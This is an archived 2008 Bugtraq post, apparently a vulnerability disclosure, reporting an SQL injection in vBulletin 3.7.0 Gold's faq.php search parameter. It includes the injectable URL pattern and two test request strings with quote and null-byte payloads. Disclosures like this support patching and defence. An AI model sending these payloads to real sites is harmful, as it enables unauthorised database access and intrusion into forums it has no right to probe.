lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20080520144954.23722.qmail@securityfocus.com> Date: 20 May 2008 14:49:54 -0000 From: a.jasbi@...oo.com To: bugtraq@...urityfocus.com Subject: Vbulletin 3.7.0 Gold >> Sql injection on faq.php By : Ali Jasbi(Hackerz.ir security & hacking research team) Vendor : vbulletin.org version : 3.7.0 Gold Vulnerability: Sql injection http://www.domain.com/vBulletin/faq.php?s=&do=search&q=[Sql injection]&match=any&titlesonly=1 test it: faq.php?s=&do=search&q='&match=any&titlesonly=1 faq.php?s=&do=search&q=%00'&match=all&titlesonly=0 Enjoy it...